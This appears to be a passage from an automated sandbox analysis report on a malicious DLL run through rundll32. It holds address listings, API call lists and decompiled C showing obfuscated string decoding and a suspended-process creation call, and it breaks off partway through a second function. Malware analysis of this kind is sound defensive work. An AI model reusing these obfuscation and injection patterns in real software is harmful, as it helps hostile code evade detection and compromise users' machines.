                                                      0x6e777c3f
                                                      0x6e777c44
                                                      0x6e777c49
                                                      0x6e777c4e
                                                      0x6e777c53
                                                      0x6e777c58
                                                      0x6e777c5d
                                                      0x6e777c62
                                                      0x6e777c6b
                                                      0x6e777c75
                                                      0x6e777c79
                                                      0x6e777c7b
                                                      0x6e777c7c
                                                      0x6e777c89
                                                      0x6e777c8c
                                                      0x6e777c8f
                                                      0x6e777c90
                                                      0x6e777c92
                                                      0x6e777c96
                                                      0x6e777c97
                                                      0x6e777c9c
                                                      0x6e777ca0
                                                      0x6e777ca0
                                                      0x6e777cac
                                                      0x6e777cc9
                                                      0x6e777ccd
                                                      0x6e777cd3
                                                      0x6e777cf6
                                                      0x6e777cf6
                                                      0x6e777cf9
                                                      0x6e777d00
                                                      0x6e77818a
                                                      0x6e77818f
                                                      0x6e778191
                                                      0x6e778196
                                                      0x6e7781a4
                                                      0x6e7781b1
                                                      0x00000000
                                                      0x6e777d06
                                                      0x6e777d06
                                                      0x6e777d26
                                                      0x6e777d2d
                                                      0x00000000
                                                      0x6e777d33
                                                      0x6e777d33
                                                      0x6e777d36
                                                      0x6e777d41
                                                      0x6e777d4a
                                                      0x6e777d4e
                                                      0x6e777d53
                                                      0x6e777d5c
                                                      0x6e777d61
                                                      0x6e777d63
                                                      0x6e777d68
                                                      0x6e777d6d
                                                      0x6e777d72
                                                      0x6e777d77
                                                      0x6e777d7c
                                                      0x6e777d81
                                                      0x6e777d86
                                                      0x6e777d8b
                                                      0x6e777d90
                                                      0x6e777d95
                                                      0x6e777d9a
                                                      0x6e777d9f
                                                      0x6e777da4
                                                      0x6e777da9
                                                      0x6e777dae
                                                      0x6e777db3
                                                      0x6e777db8
                                                      0x6e777dbd
                                                      0x6e777dc6
                                                      0x6e777dcb
                                                      0x6e777dd1
                                                      0x6e777dd4
                                                      0x6e777dd9
                                                      0x6e777dda
                                                      0x6e777ddf
                                                      0x00000000
                                                      0x6e777de5
                                                      0x6e777de5
                                                      0x6e777de9
                                                      0x6e777ded
                                                      0x6e777df5
                                                      0x6e777e22
                                                      0x00000000
                                                      0x6e777e28
                                                      0x6e777e28
                                                      0x6e777e31
                                                      0x6e777e35
                                                      0x6e777e3a
                                                      0x6e777e46
                                                      0x6e777e5c
                                                      0x00000000
                                                      0x6e777e62
                                                      0x6e777e62
                                                      0x6e777e66
                                                      0x6e777e68
                                                      0x6e777e6e
                                                      0x6e777ebd
                                                      0x6e777ec2
                                                      0x6e77810b
                                                      0x6e778116
                                                      0x6e778122
                                                      0x6e77813b
                                                      0x00000000
                                                      0x6e77813d
                                                      0x6e778144
                                                      0x6e77815e
                                                      0x00000000
                                                      0x6e778174
                                                      0x6e77817f
                                                      0x6e778184
                                                      0x6e77815e
                                                      0x6e777ec8
                                                      0x6e777eca
                                                      0x6e777ed0
                                                      0x6e777ede
                                                      0x6e777ee2
                                                      0x6e777ee2
                                                      0x6e777ee7
                                                      0x6e777eec
                                                      0x6e777ef1
                                                      0x6e777ef6
                                                      0x6e777efb
                                                      0x6e777f00
                                                      0x6e777f09
                                                      0x6e777f13
                                                      0x6e777f17
                                                      0x6e777f19
                                                      0x6e777f1a
                                                      0x6e777f23
                                                      0x6e777f29
                                                      0x6e777f2c
                                                      0x6e777f2f
                                                      0x6e777f30
                                                      0x6e777f32
                                                      0x6e777f36
                                                      0x6e777f37
                                                      0x6e777f3c
                                                      0x6e777f40
                                                      0x6e777f40
                                                      0x6e777f45
                                                      0x6e777f4a
                                                      0x6e777f53
                                                      0x6e777f58
                                                      0x6e777f5a
                                                      0x6e777f5f
                                                      0x6e777f64
                                                      0x6e777f69
                                                      0x6e777f6e
                                                      0x6e777f73
                                                      0x6e777f78
                                                      0x6e777f7d
                                                      0x6e777f82
                                                      0x6e777f87
                                                      0x6e777f8c
                                                      0x6e777f91
                                                      0x6e777f96
                                                      0x6e777f9b
                                                      0x6e777fa0
                                                      0x6e777fa9
                                                      0x6e777fae
                                                      0x6e777fb4
                                                      0x6e777fb7
                                                      0x6e777fbc
                                                      0x6e777fc4
                                                      0x6e777fc6
                                                      0x6e777fc7
                                                      0x6e777fcd
                                                      0x6e777ff3
                                                      0x6e777ff6
                                                      0x6e777ffd
                                                      0x6e777fff
                                                      0x6e77800a
                                                      0x6e778015
                                                      0x6e77801b
                                                      0x6e778021
                                                      0x6e778025
                                                      0x6e778028
                                                      0x6e778030
                                                      0x6e778032
                                                      0x6e778035
                                                      0x6e77803f
                                                      0x6e778041
                                                      0x6e778045
                                                      0x6e77804e
                                                      0x6e778050
                                                      0x6e778050
                                                      0x6e778058
                                                      0x6e77805b
                                                      0x6e77805e
                                                      0x6e778065
                                                      0x00000000
                                                      0x6e778067
                                                      0x6e778067
                                                      0x6e778076
                                                      0x6e778087
                                                      0x6e778095
                                                      0x6e77809e
                                                      0x00000000
                                                      0x6e7780a4
                                                      0x6e7780a8
                                                      0x6e7780b6
                                                      0x6e7780d6
                                                      0x00000000
                                                      0x6e7780dc
                                                      0x6e7780dc
                                                      0x6e7780e0
                                                      0x00000000
                                                      0x6e7780e0
                                                      0x6e7780d6
                                                      0x6e77809e
                                                      0x00000000
                                                      0x6e7780e4
                                                      0x6e7780e8
                                                      0x6e7780e9
                                                      0x6e7780ed
                                                      0x6e7780f7
                                                      0x6e7780fb
                                                      0x6e7780fb
                                                      0x00000000
                                                      0x6e7780ff
                                                      0x6e7780ff
                                                      0x6e778107
                                                      0x6e778107
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e777fcf
                                                      0x6e777fd6
                                                      0x6e777fd7
                                                      0x6e777fdb
                                                      0x6e777fdf
                                                      0x6e777fe9
                                                      0x00000000
                                                      0x6e777ed0
                                                      0x6e777e70
                                                      0x6e777e76
                                                      0x6e777e78
                                                      0x6e777e78
                                                      0x6e777e7d
                                                      0x00000000
                                                      0x6e777e7f
                                                      0x6e777e8b
                                                      0x6e777ea3
                                                      0x00000000
                                                      0x6e777ea9
                                                      0x6e777ea9
                                                      0x6e777ead
                                                      0x00000000
                                                      0x6e777ead
                                                      0x6e777ea3
                                                      0x00000000
                                                      0x6e777eb1
                                                      0x6e777eb1
                                                      0x6e777eb2
                                                      0x6e777eb5
                                                      0x6e777eb9
                                                      0x00000000
                                                      0x6e777e78
                                                      0x6e777e6e
                                                      0x6e777e5c
                                                      0x6e777e22
                                                      0x6e777ddf
                                                      0x6e777d2d
                                                      0x6e777d00
                                                      0x6e7781b8
                                                      0x6e7781bf
                                                      0x6e7781c0
                                                      0x6e7781c1
                                                      0x6e7781cc

                                                      APIs
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000074), ref: 6E777CC9
                                                        • Part of subcall function 6E77657F: GetProcAddress.KERNEL32(0000000C,00000000,0000000C,?,6E777BB1,00000000), ref: 6E77658E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AddressCreateH_prolog3ProcProcess
                                                      • String ID: %$%$%$%$'$'$*$+$4$5$5$5$:$?$@$@$@$A$A$E$F$G$I$L$M$W$Z$\$\$]$^$_$_$`$e$f$j$j$k$m$o$o$t$u$u$u${
                                                      • API String ID: 1905150259-1774018862
                                                      • Opcode ID: b148794aa4c2d5b4c0cc0919a312b8d029c5bf808c42b7a3aebc6ac672e88b22
                                                      • Instruction ID: 64abd15b7cb9d7775053b6b607d56ab3957e5e8105ec0e385c71605526dd2eb1
                                                      • Opcode Fuzzy Hash: b148794aa4c2d5b4c0cc0919a312b8d029c5bf808c42b7a3aebc6ac672e88b22
                                                      • Instruction Fuzzy Hash: CA028C7010C3819EEB21CF68C958B9BBBE5AF95308F084D2DE5D4872A1D7B5D908CB63
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77315C, Relevance: 66.8, APIs: 19, Strings: 19, Instructions: 345memorystringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 578 6e77315c-6e773187 call 6e774aee 581 6e77318d-6e7731af 578->581 582 6e77350a-6e773516 call 6e778727 578->582 584 6e7731b1 581->584 585 6e7731d9-6e7731fa call 6e774b9d 581->585 587 6e7731b3-6e7731d3 584->587 591 6e773200-6e773215 GetProcessHeap HeapAlloc 585->591 592 6e7734f8-6e773500 GetProcessHeap HeapFree 585->592 587->587 589 6e7731d5 587->589 589->585 591->592 593 6e77321b-6e773255 lstrcpynA call 6e773d6d call 6e77be34 591->593 594 6e773506 592->594 600 6e773257-6e77326f GetProcessHeap HeapFree GetProcessHeap HeapFree 593->600 601 6e773274-6e77327b 593->601 596 6e773508-6e773509 594->596 596->582 600->594 602 6e773280-6e7732b7 601->602 603 6e7732b9-6e7732bd 602->603 604 6e7732e8-6e773300 call 6e774b9d 602->604 605 6e7732be-6e7732dc 603->605 609 6e773306-6e773325 call 6e774cc5 604->609 610 6e7734da-6e7734f6 GetProcessHeap HeapFree GetProcessHeap HeapFree 604->610 605->605 607 6e7732de-6e7732e4 605->607 607->604 609->602 613 6e77332b-6e77333d GetProcessHeap HeapAlloc 609->613 610->596 614 6e773343-6e773350 lstrcpynA 613->614 615 6e77327d 613->615 616 6e773362-6e7733c1 call 6e773d05 call 6e773d39 call 6e778228 614->616 617 6e773352-6e77335d GetProcessHeap HeapFree 614->617 615->602 624 6e7733f4-6e77340d 616->624 625 6e7733c3-6e7733c7 616->625 617->615 627 6e773440-6e773477 call 6e778228 624->627 628 6e77340f-6e773413 624->628 626 6e7733c8-6e7733e8 625->626 626->626 629 6e7733ea-6e7733f0 626->629 634 6e7734a2-6e7734bd call 6e773ccb call 6e778228 call 6e773082 627->634 635 6e773479-6e77347d 627->635 630 6e773414-6e773434 628->630 629->624 630->630 632 6e773436-6e77343c 630->632 632->627 643 6e7734c2-6e7734d1 call 6e778207 634->643 636 6e77347e-6e77349c 635->636 636->636 638 6e77349e 636->638 638->634 643->602 646 6e7734d7 643->646 646->610
                                                      C-Code - Quality: 91%
                                                      			E6E77315C(void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _v14;
				char _v15;
				char _v16;
				void* _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				void* _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				void* _v44;
				char _v46;
				char _v47;
				char _v48;
				char _v50;
				char _v51;
				char _v52;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				intOrPtr _v80;
				int _v84;
				signed int _v88;
				void* _v92;
				int _v96;
				signed int _v100;
				long _v104;
				char _v108;
				signed int _v112;
				CHAR* _v116;
				void* __ebx;
				void* __esi;
				signed int _t183;
				void* _t192;
				CHAR* _t197;
				void* _t198;
				void* _t204;
				void* _t211;
				CHAR* _t213;
				long _t214;
				void* _t218;
				void* _t227;
				void* _t229;
				void* _t269;
				signed int _t271;
				void* _t287;
				void* _t298;
				void* _t299;
				void* _t301;
				void* _t303;
				signed int _t320;
				void* _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				void* _t325;
				int _t327;
				char* _t328;
				void* _t329;
				int _t331;
				void* _t332;
				void* _t333;
				void* _t335;
				signed int _t336;

				_t319 = __edi;
				_t183 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t183 ^ _t336;
				_t269 = 0;
				_v44 = 0;
				_v108 = 0;
				if(E6E774AEE(_a4, __edi,  &_v44,  &_v108) != 0) {
					_v40 = 0x1e;
					_v39 = 0x49;
					_v38 = 0x35;
					_push(_t325);
					_v37 = 0x16;
					_v36 = 8;
					_push(__edi);
					_v35 = 0;
					_t320 = 0x7f;
					if(_v35 == 0) {
						_t335 = 0;
						do {
							_t303 = 8;
							asm("cdq");
							asm("cdq");
							 *(_t336 + _t335 - 0x24) = (_t320 + (_t303 - ( *(_t336 + _t335 - 0x24) & 0x000000ff)) * 0x14 % _t320) % _t320;
							_t335 = _t335 + 1;
						} while (_t335 < 5);
						_v35 = 1;
					}
					_v84 = _t269;
					_t305 = 0;
					_t192 = E6E774B9D(_t269, _v44, 0, _t320,  &_v40,  &_v84);
					_t321 = GetProcessHeap;
					_t269 = _t192;
					if(_t269 == 0) {
						L35:
						HeapFree(GetProcessHeap(), 0, _v44);
						goto L36;
					} else {
						_t327 = _v84 + 1;
						_v84 = _t327;
						_t197 = HeapAlloc(GetProcessHeap(), 0, _t327);
						if(_t197 == 0) {
							goto L35;
						} else {
							_t198 = lstrcpynA(_t197, _t269, _t327);
							_v12 = _v12 & 0x00000000;
							_t269 = _t198;
							_v48 = 0x14;
							_v47 = 0x1f;
							_v92 = _t269;
							_v46 = 0;
							if( *((char*)(E6E77BE34(_t269, E6E773D6D( &_v48),  &_v12))) != 0) {
								_t269 = 0;
								_t328 = 0;
								_v112 = _v112 & 0;
								goto L11;
								do {
									while(1) {
										L11:
										_v68 = 0x3d;
										_v67 = 0xc;
										_v66 = 0x4d;
										_v65 = 0x6c;
										_v64 = 0x22;
										_v63 = 0xd;
										_v62 = 0xd;
										_v61 = 0x26;
										_v60 = 0x72;
										_v59 = 0xc;
										_v58 = 0x28;
										_v57 = 0;
										__eflags = _v57;
										if(_v57 == 0) {
										}
										L12:
										_t287 = 0;
										__eflags = 0;
										_t322 = 0x7f;
										do {
											asm("cdq");
											asm("cdq");
											 *(_t336 + _t287 - 0x40) = (_t322 + (( *(_t336 + _t287 - 0x40) & 0x000000ff) - 0x28) * 0xa % _t322) % _t322;
											_t287 = _t287 + 1;
											__eflags = _t287 - 0xb;
										} while (_t287 < 0xb);
										_t321 = GetProcessHeap;
										_v57 = 1;
										L15:
										_t305 = _t328;
										_t329 = _v44;
										_t204 = E6E774B9D(_t269, _t329, _t328, _t321,  &_v68,  &_v112);
										__eflags = _t204;
										if(_t204 != 0) {
											L16:
											_v88 = _v88 & 0x00000000;
											_v80 = _t204 - _t329;
											_t211 = E6E774CC5(_t329, _t204 - _t329,  &_v88);
											_t328 = _v80;
											_v116 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L11:
												_v68 = 0x3d;
												_v67 = 0xc;
												_v66 = 0x4d;
												_v65 = 0x6c;
												_v64 = 0x22;
												_v63 = 0xd;
												_v62 = 0xd;
												_v61 = 0x26;
												_v60 = 0x72;
												_v59 = 0xc;
												_v58 = 0x28;
												_v57 = 0;
												__eflags = _v57;
												if(_v57 == 0) {
												}
												goto L15;
											} else {
												L17:
												_t331 = _v88 + 1;
												_t213 = HeapAlloc(GetProcessHeap(), 0, _t331);
												__eflags = _t213;
												if(_t213 == 0) {
													L10:
													_t328 = _v80;
													do {
														goto L11;
													} while (_t211 == 0);
													goto L17;
												} else {
													_t214 = lstrcpynA(_t213, _v116, _t331);
													__eflags = _t214;
													if(_t214 != 0) {
														_v104 = _t214;
														_v100 = _v88;
														_v96 = _t331;
														_v52 = 0x3f;
														_v51 = 0x3a;
														_v50 = 0;
														_v76 = 0x2e;
														_v75 = 0x42;
														_v74 = 0x20;
														_v73 = 0x4d;
														_v72 = 0;
														_t218 = E6E773D05( &_v52);
														_t102 =  &_v76; // 0x2e
														E6E778228( &_v104, E6E773D39(_t102), _t218);
														_v16 = 0x44;
														_v15 = 0x14;
														_v14 = 0;
														__eflags = _v14;
														if(_v14 == 0) {
															_t333 = 0;
															_t324 = 0x7f;
															do {
																_t301 = 0x14;
																asm("cdq");
																asm("cdq");
																 *(_t336 + _t333 - 0xc) = (_t324 + (_t301 - ( *(_t336 + _t333 - 0xc) & 0x000000ff)) * 0x2c % _t324) % _t324;
																_t333 = _t333 + 1;
																__eflags = _t333 - 2;
															} while (_t333 < 2);
															_t321 = GetProcessHeap;
															_v14 = 1;
														}
														_v24 = 0x71;
														_v23 = 0x59;
														_v22 = 0xd;
														_v21 = 0x19;
														_v20 = 0;
														__eflags = _v20;
														if(_v20 == 0) {
															_t332 = 0;
															_t323 = 0x7f;
															do {
																_t299 = 0x19;
																asm("cdq");
																asm("cdq");
																 *(_t336 + _t332 - 0x14) = (_t323 + (_t299 - ( *(_t336 + _t332 - 0x14) & 0x000000ff)) * 0x1b % _t323) % _t323;
																_t332 = _t332 + 1;
																__eflags = _t332 - 4;
															} while (_t332 < 4);
															_t321 = GetProcessHeap;
															_v20 = 1;
														}
														E6E778228( &_v104,  &_v24,  &_v16);
														_v56 = 0x6c;
														_v55 = 0xa;
														_v54 = 0;
														_v32 = 0x59;
														_v31 = 0xf;
														_v30 = 0x22;
														_v29 = 0x55;
														_v28 = 0;
														__eflags = _v28;
														if(_v28 == 0) {
															_t298 = 0;
															_t271 = 0x7f;
															do {
																asm("cdq");
																asm("cdq");
																 *(_t336 + _t298 - 0x1c) = (_t271 + (( *(_t336 + _t298 - 0x1c) & 0x000000ff) - 0x55) * 0x29 % _t271) % _t271;
																_t298 = _t298 + 1;
																__eflags = _t298 - 4;
															} while (_t298 < 4);
															_v28 = 1;
														}
														break;
													} else {
														HeapFree(GetProcessHeap(), _t214, _t214);
														goto L10;
													}
												}
											}
										}
										L34:
										HeapFree(GetProcessHeap(), 0, _v92);
										HeapFree(GetProcessHeap(), 0, _t329);
										goto L37;
									}
									_t227 = E6E773CCB( &_v56);
									_t305 =  &_v32;
									E6E778228( &_v104,  &_v32, _t227);
									_t229 = E6E773082(__eflags, _v92, _v104); // executed
									_t269 = _t229;
									E6E778207( &_v104);
									_t328 = _v80;
									__eflags = _t269;
								} while (_t269 == 0);
								_t329 = _v44;
								goto L34;
							} else {
								HeapFree(GetProcessHeap(), 0, _t269);
								HeapFree(GetProcessHeap(), 0, _v44);
								L36:
							}
						}
					}
					L37:
					_pop(_t319);
					_pop(_t325);
				}
				return E6E778727(_t269, _v8 ^ _t336, _t305, _t319, _t325);
			}































































































                                                      0x6e77315c
                                                      0x6e773162
                                                      0x6e773169
                                                      0x6e773177
                                                      0x6e77317a
                                                      0x6e77317d
                                                      0x6e773187
                                                      0x6e77318d
                                                      0x6e773191
                                                      0x6e773195
                                                      0x6e773199
                                                      0x6e77319a
                                                      0x6e77319e
                                                      0x6e7731a5
                                                      0x6e7731a6
                                                      0x6e7731ab
                                                      0x6e7731af
                                                      0x6e7731b1
                                                      0x6e7731b3
                                                      0x6e7731bc
                                                      0x6e7731c2
                                                      0x6e7731c8
                                                      0x6e7731cb
                                                      0x6e7731cf
                                                      0x6e7731d0
                                                      0x6e7731d5
                                                      0x6e7731d5
                                                      0x6e7731e3
                                                      0x6e7731e7
                                                      0x6e7731e9
                                                      0x6e7731ee
                                                      0x6e7731f4
                                                      0x6e7731fa
                                                      0x6e7734f8
                                                      0x6e773500
                                                      0x00000000
                                                      0x6e773200
                                                      0x6e773203
                                                      0x6e773207
                                                      0x6e77320d
                                                      0x6e773215
                                                      0x00000000
                                                      0x6e77321b
                                                      0x6e77321e
                                                      0x6e773224
                                                      0x6e773228
                                                      0x6e77322a
                                                      0x6e77322e
                                                      0x6e773238
                                                      0x6e77323b
                                                      0x6e773255
                                                      0x6e773274
                                                      0x6e773276
                                                      0x6e773278
                                                      0x6e77327b
                                                      0x6e773280
                                                      0x6e773280
                                                      0x6e773280
                                                      0x6e773280
                                                      0x6e773284
                                                      0x6e773288
                                                      0x6e77328c
                                                      0x6e773290
                                                      0x6e773294
                                                      0x6e773298
                                                      0x6e77329c
                                                      0x6e7732a0
                                                      0x6e7732a4
                                                      0x6e7732a8
                                                      0x6e7732af
                                                      0x6e7732b3
                                                      0x6e7732b7
                                                      0x6e7732b7
                                                      0x6e7732b9
                                                      0x6e7732bb
                                                      0x6e7732bb
                                                      0x6e7732bd
                                                      0x6e7732be
                                                      0x6e7732cb
                                                      0x6e7732d1
                                                      0x6e7732d4
                                                      0x6e7732d8
                                                      0x6e7732d9
                                                      0x6e7732d9
                                                      0x6e7732de
                                                      0x6e7732e4
                                                      0x6e7732e8
                                                      0x6e7732eb
                                                      0x6e7732ed
                                                      0x6e7732f7
                                                      0x6e7732fe
                                                      0x6e773300
                                                      0x6e773306
                                                      0x6e773306
                                                      0x6e773312
                                                      0x6e773317
                                                      0x6e77331c
                                                      0x6e77331f
                                                      0x6e773323
                                                      0x6e773325
                                                      0x6e773280
                                                      0x6e773280
                                                      0x6e773284
                                                      0x6e773288
                                                      0x6e77328c
                                                      0x6e773290
                                                      0x6e773294
                                                      0x6e773298
                                                      0x6e77329c
                                                      0x6e7732a0
                                                      0x6e7732a4
                                                      0x6e7732a8
                                                      0x6e7732af
                                                      0x6e7732b3
                                                      0x6e7732b7
                                                      0x6e7732b7
                                                      0x00000000
                                                      0x6e77332b
                                                      0x6e77332b
                                                      0x6e77332e
                                                      0x6e773335
                                                      0x6e77333b
                                                      0x6e77333d
                                                      0x6e77327d
                                                      0x6e77327d
                                                      0x6e773280
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e773343
                                                      0x6e773348
                                                      0x6e77334e
                                                      0x6e773350
                                                      0x6e773362
                                                      0x6e77336d
                                                      0x6e773370
                                                      0x6e773373
                                                      0x6e773377
                                                      0x6e77337e
                                                      0x6e773381
                                                      0x6e773385
                                                      0x6e773389
                                                      0x6e77338d
                                                      0x6e773394
                                                      0x6e773397
                                                      0x6e77339d
                                                      0x6e7733aa
                                                      0x6e7733af
                                                      0x6e7733b3
                                                      0x6e7733ba
                                                      0x6e7733be
                                                      0x6e7733c1
                                                      0x6e7733c5
                                                      0x6e7733c7
                                                      0x6e7733c8
                                                      0x6e7733d1
                                                      0x6e7733d7
                                                      0x6e7733dd
                                                      0x6e7733e0
                                                      0x6e7733e4
                                                      0x6e7733e5
                                                      0x6e7733e5
                                                      0x6e7733ea
                                                      0x6e7733f0
                                                      0x6e7733f0
                                                      0x6e7733f4
                                                      0x6e7733f8
                                                      0x6e7733fc
                                                      0x6e773400
                                                      0x6e773407
                                                      0x6e77340a
                                                      0x6e77340d
                                                      0x6e773411
                                                      0x6e773413
                                                      0x6e773414
                                                      0x6e77341d
                                                      0x6e773423
                                                      0x6e773429
                                                      0x6e77342c
                                                      0x6e773430
                                                      0x6e773431
                                                      0x6e773431
                                                      0x6e773436
                                                      0x6e77343c
                                                      0x6e77343c
                                                      0x6e77344a
                                                      0x6e77344f
                                                      0x6e773453
                                                      0x6e77345a
                                                      0x6e77345d
                                                      0x6e773461
                                                      0x6e773465
                                                      0x6e773469
                                                      0x6e773470
                                                      0x6e773474
                                                      0x6e773477
                                                      0x6e77347b
                                                      0x6e77347d
                                                      0x6e77347e
                                                      0x6e77348b
                                                      0x6e773491
                                                      0x6e773494
                                                      0x6e773498
                                                      0x6e773499
                                                      0x6e773499
                                                      0x6e77349e
                                                      0x6e77349e
                                                      0x00000000
                                                      0x6e773352
                                                      0x6e773357
                                                      0x00000000
                                                      0x6e773357
                                                      0x6e773350
                                                      0x6e77333d
                                                      0x6e773325
                                                      0x6e7734da
                                                      0x6e7734e2
                                                      0x6e7734ee
                                                      0x00000000
                                                      0x6e7734f4
                                                      0x6e7734a5
                                                      0x6e7734ab
                                                      0x6e7734b1
                                                      0x6e7734bd
                                                      0x6e7734c5
                                                      0x6e7734c7
                                                      0x6e7734cc
                                                      0x6e7734cf
                                                      0x6e7734cf
                                                      0x6e7734d7
                                                      0x00000000
                                                      0x6e773257
                                                      0x6e773263
                                                      0x6e77326d
                                                      0x6e773506
                                                      0x6e773506
                                                      0x6e773255
                                                      0x6e773215
                                                      0x6e773508
                                                      0x6e773508
                                                      0x6e773509
                                                      0x6e773509
                                                      0x6e773516

                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 6E77320A
                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 6E77320D
                                                      • lstrcpynA.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 6E77321E
                                                      • __fassign.LIBCMT ref: 6E77324A
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 6E77325A
                                                      • HeapFree.KERNEL32(00000000), ref: 6E773263
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E77326A
                                                      • HeapFree.KERNEL32(00000000), ref: 6E77326D
                                                      • GetProcessHeap.KERNEL32(00000000,00000001,?,?), ref: 6E773332
                                                      • HeapAlloc.KERNEL32(00000000), ref: 6E773335
                                                      • lstrcpynA.KERNEL32(00000000,?,00000001), ref: 6E773348
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E773354
                                                      • HeapFree.KERNEL32(00000000), ref: 6E773357
                                                        • Part of subcall function 6E778228: lstrlenA.KERNEL32(00000000,766F14B9,00000001,00000000), ref: 6E778246
                                                        • Part of subcall function 6E778228: lstrlenA.KERNEL32(00000000), ref: 6E77824E
                                                        • Part of subcall function 6E778228: StrStrA.SHLWAPI(?,00000000), ref: 6E77825E
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 6E7734DF
                                                      • HeapFree.KERNEL32(00000000), ref: 6E7734E2
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E7734EB
                                                      • HeapFree.KERNEL32(00000000), ref: 6E7734EE
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 6E7734FD
                                                      • HeapFree.KERNEL32(00000000), ref: 6E773500
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$Alloclstrcpynlstrlen$__fassign
                                                      • String ID: "$"$&$($.B M$5$:$=$?$D$I$M$U$Y$Y$l$l$q$r
                                                      • API String ID: 4125328873-3246738519
                                                      • Opcode ID: bcf20ba470c18534f02690038cb035928098f54724d533a0b04cc1262db8c674
                                                      • Instruction ID: a2cb25b69ae8d6674639b5606d7630811683a6561ac303cd5c5b03a3b289a27e
                                                      • Opcode Fuzzy Hash: bcf20ba470c18534f02690038cb035928098f54724d533a0b04cc1262db8c674
                                                      • Instruction Fuzzy Hash: FCD1D331D08289AEEF12CBF9D958BEEBFF8AF16304F140069D441BB291D6B55905CB71
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E773519, Relevance: 50.9, APIs: 1, Strings: 28, Instructions: 176COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 647 6e773519-6e773542 call 6e7843cb call 6e77111c call 6e772f23 654 6e77370c-6e773718 call 6e77111c call 6e7752ed 647->654 655 6e773548-6e7735ae 647->655 674 6e77371b 654->674 657 6e7735e0-6e77361e 655->657 658 6e7735b0-6e7735b4 655->658 661 6e773646-6e773664 657->661 662 6e773620 657->662 660 6e7735b5-6e7735d5 658->660 660->660 666 6e7735d7-6e7735df 660->666 663 6e773666-6e77366a 661->663 664 6e773693-6e7736b7 call 6e773c02 661->664 667 6e773622-6e773640 662->667 669 6e77366b-6e77368b 663->669 675 6e7736e6-6e7736f8 call 6e773be3 664->675 676 6e7736b9-6e7736c4 call 6e77315c 664->676 666->657 667->667 668 6e773642 667->668 668->661 669->669 672 6e77368d-6e773691 669->672 672->664 677 6e77371d-6e773722 call 6e784386 674->677 675->674 684 6e7736fa-6e77370a call 6e77111c call 6e778517 675->684 676->675 685 6e7736c6-6e7736d0 676->685 684->674 687 6e7736e2-6e7736e4 685->687 688 6e7736d2-6e7736dd call 6e77111c call 6e778517 685->688 687->677 688->687
                                                      C-Code - Quality: 82%
                                                      			E6E773519(intOrPtr* __ecx, void* __edi) {
				intOrPtr _t112;
				char _t115;
				void* _t128;
				char _t150;
				signed int _t153;
				signed int _t156;
				void* _t162;
				char _t163;
				void* _t164;
				void* _t171;
				signed int _t172;
				char _t173;
				char _t174;
				intOrPtr* _t175;
				void* _t176;

				_t171 = __edi;
				_push(0x40);
				E6E7843CB();
				_t175 = __ecx;
				_t2 = E6E77111C() + 4; // 0x4, executed
				_t156 = _t2;
				_t112 = E6E772F23(_t156, _t171,  *__ecx,  *((intOrPtr*)(_t176 + 8))); // executed
				 *((intOrPtr*)(_t175 + 4)) = _t112;
				if(_t112 == 0) {
					 *((intOrPtr*)(_t175 + 0x14)) = E6E7752ED(E6E77111C(), _t171);
					L21:
					_t115 = 0;
					__eflags = 0;
					L22:
					E6E784386();
					return _t115;
				}
